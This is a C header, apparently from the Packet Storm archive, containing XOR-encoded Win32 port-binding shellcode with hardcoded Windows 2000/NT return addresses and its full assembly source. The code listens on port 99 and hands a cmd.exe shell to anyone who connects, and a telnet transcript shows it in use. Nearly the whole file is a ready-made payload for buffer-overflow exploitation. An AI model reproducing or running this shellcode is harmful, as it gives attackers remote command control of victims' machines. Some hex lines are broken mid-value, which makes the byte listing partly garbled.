WinShellCode. win32 portbinding shellcode.
4359c1d127a45198387c46cccc11eb6234af6fa024f2e4666bbbb918a9669a75/******************************************************************************
**************************
WinShellCode Writen by sunx
sunx@cnns.net, https://www.cnns.net
This shellcode works like most remote UNIX shell
it will listen on port 99,
when telnet to chis port, a cmd.exe shell will active
It is asm code is followed.
For remove char(0) in data
shellcode is xor 0x99, it will decode itself, when on run
when overflow, run time cpu mirror is :
-------------------RRRR-NOPNOPNOPNOPNOPNOPNOP-ShellCodeShellCodeShellCode------
-------------
^ ^
| |
| |
ESP point to here shellcode place here
ESP must less than shellcode start address, when run this shellcode
[root@Linux /]# telnet 192.168.0.5 99
Trying 192.168.0.5...
Connected to sunx (192.168.0.5).
Escape character is '^]'.
Microsoft Windows 2000 [Version 5.00.2195]
(C) °æȨËùÓÐ 1985-2000 Microsoft Corp.
E:\work\asm\winshell\conv>cd \
cd \
E:\>^]q
Connection closed.
[root@Linux /]# telnet 192.168.0.5 99
Trying 192.168.0.5...
Connected to sunx (192.168.0.5).
Escape character is '^]'.
E:\>c:
c:
C:\>
*******************************************************************************
*************************/
#ifndef WINSHELLCODE_H
#define WINSHELLCODE_H
const unsigned long OfsShellCodeLoadLib = 0x436;
const unsigned long OfsShellCodeGetProc = 0x43a;
const unsigned long OfsShellCodeShell = 0x442;
const unsigned long JMPESP_Win2k2195 = 0x77e6898b;
const unsigned long JMPESP_WinNTsp6 = 0x77f0eac3;
const unsigned long LoadLib_Win2k2195 = 0x77e67273;
const unsigned long GetProc_Win2k2195 = 0x77e67031;
const unsigned long LoadLib_WinNTsp6 = 0x77ee391a;
const unsigned long GetProc_WinNTsp6 = 0x77ee4111;
unsigned char shellcode[]=
{
0x8b, 0xfc, 0xb8, 0x73, 0x75, 0x6e, 0x78, 0x47, 0x39, 0x07, 0x75, 0
xfb, 0x8d, 0x6f, 0xfd, 0x8d,
0x7d, 0x26, 0x90, 0x90, 0x90, 0x8b, 0xf7, 0xb4, 0x99, 0xfc, 0xa
c, 0x32, 0xc4, 0xaa, 0x81, 0x3e,
0x73, 0x75, 0x6e, 0x78, 0x75, 0xf4, 0x14, 0x24, 0xdb, 0x9d, 0x9
9, 0x99, 0x65, 0xaa, 0x50, 0x28,
0xb9, 0x29, 0xbd, 0x6b, 0x37, 0x5f, 0xde, 0x66, 0x99, 0x71, 0x4
c, 0x9b, 0x99, 0x99, 0x71, 0x41,
0x98, 0x99, 0x99, 0x10, 0x1c, 0xb3, 0x9d, 0x99, 0x99, 0x71, 0x4
4, 0x98, 0x99, 0x99, 0x71, 0xcb,
0x9b, 0x99, 0x99, 0x10, 0x1c, 0xb7, 0x9d, 0x99, 0x99, 0x71, 0x9
d, 0x98, 0x99, 0x99, 0x12, 0x1c,
0xb7, 0x9d, 0x99, 0x99, 0x71, 0x88, 0x9b, 0x99, 0x99, 0x10, 0x1
c, 0xab, 0x9d, 0x99, 0x99, 0x71,
0x9b, 0x99, 0x99, 0x99, 0x72, 0x71, 0x12, 0x1c, 0x8f, 0x9d, 0x9
9, 0x99, 0x71, 0x28, 0x99, 0x99,
0x99, 0x1a, 0x61, 0x99, 0xed, 0xc0, 0x09, 0x09, 0x09, 0x09, 0xa
a, 0x59, 0xc9, 0x14, 0x1c, 0xbf,
0x9d, 0x99, 0x99, 0xc9, 0xaa, 0x59, 0x2d, 0x9d, 0xc9, 0x12, 0x1
c, 0xb3, 0x9d, 0x99, 0x99, 0xc9,
0x12, 0x1c, 0x8f, 0x9d, 0x99, 0x99, 0xc9, 0x66, 0x0c, 0x55, 0x9
a, 0x99, 0x99, 0x1a, 0x61, 0x99,
0xed, 0xe4, 0x09, 0x09, 0x09, 0x09, 0xaa, 0x59, 0xc9, 0x12, 0x1
c, 0xbf, 0x9d, 0x99, 0x99, 0xc9,
0x12, 0x1c, 0xb3, 0x9d, 0x99, 0x99, 0xc9, 0x12, 0x1c, 0xab, 0x9
d, 0x99, 0x99, 0xc9, 0x66, 0x0c,
0x93, 0x9d, 0x99, 0x99, 0x1a, 0x61, 0x99, 0xe5, 0xcf, 0x09, 0x0
9, 0x09, 0x09, 0x72, 0x0e, 0xaa,
0x59, 0xc9, 0x2d, 0x9d, 0xc9, 0x12, 0x1c, 0xb3, 0x9d, 0x99, 0x9
9, 0xc9, 0x12, 0x1c, 0xab, 0x9d,
0x99, 0x99, 0xc9, 0x66, 0x0c, 0x96, 0x9d, 0x99, 0x99, 0x1a, 0x6
1, 0x99, 0xe5, 0xa8, 0x09, 0x09,
0x09, 0x09, 0xaa, 0x42, 0xca, 0x14, 0x04, 0xbf, 0x9d, 0x99, 0x9
9, 0xca, 0xc9, 0x12, 0x1c, 0xb3,
0x9d, 0x99, 0x99, 0xc9, 0x12, 0x1c, 0xbb, 0x9d, 0x99, 0x99, 0xc
9, 0x66, 0x0c, 0x5b, 0x9a, 0x99,
0x99, 0x1a, 0x61, 0x99, 0xed, 0x90, 0x09, 0x09, 0x09, 0x09, 0x7
0, 0xde, 0x66, 0x66, 0x66, 0xaa,
0x59, 0x5a, 0xaa, 0x42, 0xca, 0x14, 0x04, 0xc7, 0x98, 0x99, 0x9
9, 0xca, 0xaa, 0x42, 0xca, 0xca,
0xca, 0xc9, 0x66, 0x0c, 0x31, 0x9a, 0x99, 0x99, 0x1a, 0x61, 0x9
9, 0xed, 0x92, 0x09, 0x09, 0x09,
0x09, 0x12, 0x1c, 0xc7, 0x98, 0x99, 0x99, 0x5a, 0x21, 0x99, 0x9
9, 0x99, 0x99, 0x5a, 0x99, 0x99,
0x99, 0x99, 0x14, 0x1c, 0x52, 0x98, 0x99, 0x99, 0x5e, 0x99, 0xd
d, 0x99, 0x99, 0x99, 0xc9, 0x66,
0x0c, 0xe4, 0x9a, 0x99, 0x99, 0x12, 0x1c, 0x83, 0x9d, 0x99, 0x9
9, 0x10, 0x1c, 0x92, 0x9b, 0x99,
0x99, 0x10, 0x1c, 0x9e, 0x9b, 0x99, 0x99, 0x12, 0x1c, 0x87, 0x9
d, 0x99, 0x99, 0x10, 0x1c, 0x9a,
0x9b, 0x99, 0x99, 0xaa, 0x59, 0xff, 0x21, 0x98, 0x98, 0x10, 0x1
c, 0x6e, 0x98, 0x99, 0x99, 0x14,
0x1c, 0x52, 0x98, 0x99, 0x99, 0xc9, 0xc9, 0xaa, 0x59, 0xc9, 0xc
9, 0xc9, 0xd9, 0xc9, 0xd1, 0xc9,
0xc9, 0x14, 0x1c, 0xdb, 0x9d, 0x99, 0x99, 0xc9, 0xaa, 0x59, 0xc
9, 0x66, 0x0c, 0x14, 0x9a, 0x99,
0x99, 0x1a, 0x61, 0x99, 0x96, 0x1d, 0xdb, 0x98, 0x99, 0x99, 0x5
a, 0x99, 0x99, 0x99, 0x99, 0x99,
0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x9
9, 0x99, 0x99, 0x99, 0x99, 0x99,
0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x9
9, 0x99, 0x99, 0x99, 0x99, 0x99,
0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x9
9, 0x99, 0x99, 0x99, 0x99, 0x99,
0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x9
9, 0x99, 0x99, 0x99, 0x99, 0x99,
0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x9
9, 0xaa, 0x59, 0x2d, 0x9d, 0xc9,
0x58, 0x71, 0x9d, 0xc9, 0x66, 0x0c, 0x2f, 0x9a, 0x99, 0x99, 0x5
a, 0xaa, 0x59, 0xc9, 0x14, 0x1c,
0xf7, 0x9b, 0x99, 0x99, 0x5e, 0x99, 0x95, 0x99, 0x99, 0x99, 0xc
9, 0x14, 0x1c, 0x83, 0x9d, 0x99,
0x99, 0xc9, 0x14, 0x1c, 0x8f, 0x9d, 0x99, 0x99, 0xc9, 0x66, 0x0
c, 0xeb, 0x9a, 0x99, 0x99, 0xaa,
0x59, 0xc9, 0x14, 0x1c, 0xf7, 0x9b, 0x99, 0x99, 0xc9, 0x14, 0x1
c, 0xbb, 0x9d, 0x99, 0x99, 0xc9,
0x14, 0x1c, 0x87, 0x9d, 0x99, 0x99, 0xc9, 0x66, 0x0c, 0xeb, 0x9
a, 0x99, 0x99, 0x5a, 0x99, 0x99,
0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x98, 0x99, 0x99, 0x99, 0xc
9, 0x14, 0x04, 0x38, 0x9b, 0x99,
0x99, 0x5e, 0x9a, 0x89, 0x99, 0x99, 0x99, 0xca, 0x14, 0x04, 0x6
5, 0x9b, 0x99, 0x99, 0xca, 0xc9,
0x66, 0x0c, 0x9a, 0x9d, 0x99, 0x99, 0x12, 0x41, 0x1a, 0x61, 0x9
9, 0xc1, 0xe5, 0x45, 0x12, 0x5a,
0x5a, 0x89, 0x99, 0x99, 0x99, 0xaa, 0x59, 0xc9, 0xd9, 0xc9, 0xd
9, 0xc9, 0x66, 0x0c, 0x69, 0x9a,
0x99, 0x99, 0x1a, 0x61, 0x66, 0xed, 0xdb, 0x09, 0x09, 0x09, 0x0
9, 0x10, 0x1c, 0xb7, 0x9d, 0x99,
0x99, 0xf3, 0x89, 0x14, 0x04, 0x65, 0x9b, 0x99, 0x99, 0xca, 0xc
9, 0x66, 0x0c, 0x6e, 0x9a, 0x99,
0x99, 0x1a, 0x61, 0x99, 0xec, 0xba, 0x09, 0x09, 0x09, 0x09, 0xf
3, 0x9c, 0x12, 0x1c, 0xb7, 0x9d,
0x99, 0x99, 0xc9, 0x66, 0x0c, 0x65, 0x9a, 0x99, 0x99, 0x1a, 0x6
1, 0x99, 0xec, 0x92, 0x09, 0x09,
0x09, 0x09, 0x12, 0x1c, 0xb7, 0x9d, 0x99, 0x99, 0x5a, 0xaa, 0x5
9, 0x5a, 0x9b, 0x99, 0x99, 0xfa,
0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x9
9, 0x99, 0x66, 0x0c, 0x42, 0x9a,
0x99, 0x99, 0x5a, 0x14, 0x24, 0xf0, 0x9a, 0x99, 0x99, 0x12, 0x5
e, 0xce, 0x71, 0xb6, 0x99, 0x99,
0x99, 0xc6, 0xc9, 0xab, 0x59, 0xaa, 0x50, 0x6e, 0x48, 0x65, 0x6
b, 0x37, 0xc1, 0x19, 0xa6, 0x99,
0xed, 0x8e, 0x09, 0x09, 0x09, 0x09, 0xc9, 0xce, 0x12, 0x46, 0x7
1, 0x84, 0x99, 0x99, 0x99, 0xc6,
0x10, 0x9e, 0xc1, 0xde, 0xde, 0xde, 0xde, 0x72, 0x40, 0xde, 0x1
9, 0xa6, 0x99, 0xec, 0x53, 0x5a,
0xca, 0x14, 0x04, 0xaf, 0x9d, 0x99, 0x99, 0xc9, 0x66, 0x8a, 0xc
2, 0x5a, 0xce, 0x14, 0x24, 0xa3,
0x9d, 0x99, 0x99, 0xca, 0xc9, 0x66, 0x8e, 0xc6, 0x5a, 0xd2, 0xd
c, 0xcb, 0xd7, 0xdc, 0xd5, 0xaa,
0xab, 0x99, 0xda, 0xeb, 0xfc, 0xf8, 0xed, 0xfc, 0xc9, 0xf0, 0xe
9, 0xfc, 0x99, 0xde, 0xfc, 0xed,
0xca, 0xed, 0xf8, 0xeb, 0xed, 0xec, 0xe9, 0xd0, 0xf7, 0xff, 0xf
6, 0xd8, 0x99, 0xda, 0xeb, 0xfc,
0xf8, 0xed, 0xfc, 0xc9, 0xeb, 0xf6, 0xfa, 0xfc, 0xea, 0xea, 0xd
8, 0x99, 0xda, 0xf5, 0xf6, 0xea,
0xfc, 0xd1, 0xf8, 0xf7, 0xfd, 0xf5, 0xfc, 0x99, 0xc9, 0xfc, 0xf
c, 0xf2, 0xd7, 0xf8, 0xf4, 0xfc,
0xfd, 0xc9, 0xf0, 0xe9, 0xfc, 0x99, 0xde, 0xf5, 0xf6, 0xfb, 0xf
8, 0xf5, 0xd8, 0xf5, 0xf5, 0xf6,
0xfa, 0x99, 0xce, 0xeb, 0xf0, 0xed, 0xfc, 0xdf, 0xf0, 0xf5, 0xf
c, 0x99, 0xcb, 0xfc, 0xf8, 0xfd,
0xdf, 0xf0, 0xf5, 0xfc, 0x99, 0xca, 0xf5, 0xfc, 0xfc, 0xe9, 0x9
9, 0xdc, 0xe1, 0xf0, 0xed, 0xc9,
0xeb, 0xf6, 0xfa, 0xfc, 0xea, 0xea, 0x99, 0x99, 0xce, 0xca, 0xd
6, 0xda, 0xd2, 0xaa, 0xab, 0x99,
0xea, 0xf6, 0xfa, 0xf2, 0xfc, 0xed, 0x99, 0xfb, 0xf0, 0xf7, 0xf
d, 0x99, 0xf5, 0xf0, 0xea, 0xed,
0xfc, 0xf7, 0x99, 0xf8, 0xfa, 0xfa, 0xfc, 0xe9, 0xed, 0x99, 0xe
a, 0xfc, 0xf7, 0xfd, 0x99, 0xeb,
0xfc, 0xfa, 0xef, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x9
9, 0x99, 0x99, 0x99, 0x99, 0x99,
0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x9
9, 0x99, 0x99, 0x99, 0x99, 0x99,
0x99, 0x99, 0x99, 0x99, 0x99, 0x99,
0xea, 0xeb, 0x7f, 0xee, //address of lo
adlibrarya, it is os version depended
0xa8, 0xe9, 0x7f, 0xee, //address of ge
tprocaddress, it is os version depended
0x73, 0x75, 0x6e, 0x78, //sunx, it is a
decode flag, don't modify it
0x63, 0x6d, 0x64, 0x2e, 0x65, 0x78, 0x65, 0x24, //cmd.exe$, you
can modify it freely,
0x00
};
/******************************************************************************
**************************
;******************************************************************************
*********************
; Written by sunx
;******************************************************************************
*********************
.486
.model flat
locals
.code
shellcodebegin:
mov edi, esp
mov eax, 'xnus'
findnext: inc edi
cmp [edi], eax
jnz findnext
lea ebp, [edi + offset shellcodebegin - offset findnext + 4 ]
lea edi, [ebp + offset main - offset shellcodebegin]
mov esi, edi
mov ah, 99h
cld
xorloop:
lodsb
xor al, ah
stosb
cmp dword ptr [esi], 'xnus'
jnz xorloop
main: lea edi, [ebp + offset cmd - offset shellcodebegin]
cld
xor ecx, ecx
mov cl, 32
mov al, '$'
repnz scasb
mov byte ptr [edi-1], 0
call processapi
call initpbuf
mov [ebp + offset pbuf - offset shellcodebegin], eax
call initpipe
call initsock
mov [ebp + offset accepthand - offset shellcodebegin], eax
call initshell
runloop:
mov eax, [ebp + offset accepthand - offset shellcodebegin]
call getaconnect
mov [ebp + offset sockhand - offset shellcodebegin], eax
call runshell
jmp runloop
;******************************************************************************
*************************;*****************************************************
**************************************************;****************************
***************************************************************************
runshell proc
@@peek: mov eax, [ebp + offset pipeAread - offset shellcodebegin]
call peekdata
cmp eax, 0
jz @@readinput
;readfile()
xor eax, eax
push eax
lea eax, [ebp + offset i - offset shellcodebegin]
push eax
xor eax, eax
mov ah, 4
push eax
mov eax, [ebp + offset pbuf - offset shellcodebegin]
push eax
mov eax, [ebp + offset pipeAread - offset shellcodebegin]
push eax
call [ebp + offset readfile - offset shellcodebegin]
cmp eax, 0
jz @@exit
;send()
xor eax, eax
push eax
mov eax, [ebp + offset i - offset shellcodebegin]
push eax
mov eax, [ebp + offset pbuf - offset shellcodebegin]
push eax
mov eax, [ebp + offset sockhand - offset shellcodebegin]
push eax
call [ebp + offset send - offset shellcodebegin]
;call [ebp + offset wsagetlasterror - offset shellcodebegin]
cmp eax, 0
jl @@exit
jmp @@peek
@@readinput:
xor eax, eax
push eax
mov ah, 4
push eax
mov eax, [ebp + offset pbuf - offset shellcodebegin]
push eax
mov eax, [ebp + offset sockhand - offset shellcodebegin]
push eax
call [ebp + offset recv - offset shellcodebegin]
cmp eax, 0
jl @@exit
xor ebx, ebx
push ebx
lea ebx, [ebp + offset i - offset shellcodebegin]
push ebx
push eax
mov eax, [ebp + offset pbuf - offset shellcodebegin]
push eax
mov eax, [ebp + offset pipeBwrite - offset shellcodebegin]
push eax
call [ebp + offset writefile - offset shellcodebegin]
cmp eax, 0
jz @@exit
jmp @@peek
@@exit: xor eax, eax
ret
runshell endp
;******************************************************************************
*************************
peekdata proc ;call with eax = pipehand, return eax = bytes should be r
ead
xor ebx, ebx
push ebx
lea ebx, [ebp + offset peeki - offset shellcodebegin]
push ebx
xor ebx, ebx
push ebx
push ebx
push ebx
push eax
call [ebp + offset peeknamedpipe - offset shellcodebegin]
cmp eax, 0
jz @@error
mov eax, [ebp + offset peeki - offset shellcodebegin]
ret
@@error: mov eax, 0
ret
peeki dd 0
peekdata endp
;******************************************************************************
*************************
initshell proc
lea eax, [ebp + offset StartupInfo - offset shellcodebegin]
mov dword ptr [eax], 044h
push eax
call [ebp + offset getstartupinfo - offset shellcodebegin]
;build startinfo
mov eax, [ebp + offset pipeAwrite - offset shellcodebegin]
mov [ebp + offset StartupInfo - offset shellcodebegin + 40h], eax
mov [ebp + offset StartupInfo - offset shellcodebegin + 3ch], eax
mov eax, [ebp + offset pipeBread - offset shellcodebegin]
mov [ebp + offset StartupInfo - offset shellcodebegin + 38h], eax
xor eax, eax
mov ax, 0101h
mov [ebp + offset StartupInfo - offset shellcodebegin +2Ch], eax
lea eax, [ebp + offset StartupInfo - offset shellcodebegin]
push eax
push eax
xor eax, eax
push eax
push eax
push eax
inc eax
push eax
dec eax
push eax
push eax
lea eax, [ebp + offset cmd - offset shellcodebegin]
push eax
xor eax, eax
push eax
call [ebp + offset createprocess - offset shellcodebegin]
cmp eax, 0
jz exitshell
ret
StartupInfo db 50h dup(0)
initshell endp
;******************************************************************************
*************************
initpbuf proc ;return eax = buf
xor eax, eax
mov ah, 4
push eax
shr eax, 4
push eax
call [ebp + offset globalalloc - offset shellcodebegin]
ret
initpbuf endp
;******************************************************************************
*************************
initpipe proc
xor eax, eax
push eax
lea eax, [ebp + offset pipeattr - offset shellcodebegin]
mov dword ptr [eax], 0ch
push eax
lea eax, [ebp + offset pipeAwrite - offset shellcodebegin]
push eax
lea eax, [ebp + offset pipeAread - offset shellcodebegin]
push eax
call [ebp + offset createpipe - offset shellcodebegin]
xor eax, eax
push eax
lea eax, [ebp + offset pipeattr - offset shellcodebegin]
push eax
lea eax, [ebp + offset pipeBwrite - offset shellcodebegin]
push eax
lea eax, [ebp + offset pipeBread - offset shellcodebegin]
push eax
call [ebp + offset createpipe - offset shellcodebegin]
ret
pipeattr label
len dd 0
lpSecDesc dd 0
bInherit dd 1
initpipe endp
;******************************************************************************
*************************
getaconnect proc ;return eax = sock, call with eax = sock
@@next: push eax
lea ebx, [ebp + offset @@accepti - offset shellcodebegin]
mov dword ptr [ebx], 16
push ebx
lea ebx, [ebp + offset sockstruc - offset shellcodebegin]
push ebx
push eax
call [ebp + offset accept - offset shellcodebegin]
mov ebx, eax
cmp eax, 0
pop eax
jl @@next
mov eax, ebx
ret
@@accepti dd 16
getaconnect endp
;******************************************************************************
*************************
initsock proc ; return eax = sock
;socket()
xor eax, eax
push eax
inc eax
push eax
inc eax
push eax
call [ebp + offset socket - offset shellcodebegin]
cmp eax , 0ffffffffh
jz @@exit
mov [ebp + offset accepthand - offset shellcodebegin], eax
;bind()
push 10h
lea ebx, [ebp + offset sockstruc - offset shellcodebegin]
push ebx
push eax
call [ebp + offset bind - offset shellcodebegin]
cmp eax , 0
jnz @@exit
;listen()
push 5
mov eax, [ebp + offset accepthand - offset shellcodebegin]
push eax
call [ebp + offset listen - offset shellcodebegin]
cmp eax , 0
jnz @@exit
mov eax, [ebp + offset accepthand - offset shellcodebegin]
ret
@@exit: xor eax, eax
ret
sockstruc label
sin_family dw 0002h
sin_port dw 6300h
sin_addr dd 0
sin_zero db 8 dup (0)
initsock endp
;******************************************************************************
*************************
exitshell proc
call [ebp + offset exitprocess - offset shellcodebegin]
ret
exitshell endp
;******************************************************************************
*************************
processapi proc
;kenel api
lea edi, [ebp + offset library - offset shellcodebegin]
@@loadlib:
mov eax, edi
push edi
call loadlib
pop edi
@@nextknlapi:
push eax
xor al, al
xor ecx, ecx
not ecx
cld
repnz scasb
pop eax
cmp byte ptr [edi], 0
jz @@nextlib
push eax
push edi
mov ebx, edi
call getproc
pop edi
mov [edi], eax
pop eax
inc edi
inc edi
inc edi
inc edi
jmp @@nextknlapi
@@nextlib: inc edi
cmp byte ptr [edi], 0
jnz @@loadlib
@@ret:
ret
processapi endp
;******************************************************************************
*************************
loadlib proc ;eax=libraryname
push ebx
lea ebx, [ebp + offset LoadLibrary - offset shellcodebegin]
push eax
call dword ptr [ebx]
pop ebx
ret
loadlib endp
;******************************************************************************
*************************
getproc proc ;eax=handle, ebx = procname
push edi
lea edi, [ebp + offset GetProcAddr - offset shellcodebegin]
push ebx
push eax
call dword ptr [edi]
pop edi
ret
getproc endp
;******************************************************************************
*************************
databegin label
library label
kernel db "KERNEL32", 0
createpipe db "CreatePipe", 0
getstartupinfo db "GetStartupInfoA", 0
createprocess db "CreateProcessA", 0
closehandle db "CloseHandle", 0
peeknamedpipe db "PeekNamedPipe", 0
globalalloc db "GlobalAlloc", 0
writefile db "WriteFile", 0
readfile db "ReadFile", 0
sleep db "Sleep", 0
exitprocess db "ExitProcess", 0
db 0
wsock32 db "WSOCK32", 0
socket db "socket", 0
bind db "bind", 0
listen db "listen", 0
accept db "accept", 0
send db "send", 0
recv db "recv", 0
;wsagetlasterror db "WSAGetLastError", 0
db 0
db 0
pipeAread dd 0
pipeAwrite dd 0
pipeBread dd 0
pipeBwrite dd 0
i dd 0
pbuf dd 0
accepthand dd 0
sockhand dd 0
LoadLibrary dd 77e67273h
GetProcAddr dd 77e67031h
dd 'xnus'
cmd db "cmd.exe$"
db 0dh, 0ah
dataend label
.data
ends
end shellcodebegin
*******************************************************************************
**************************/
#endif //WINSHELLCODE_H
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed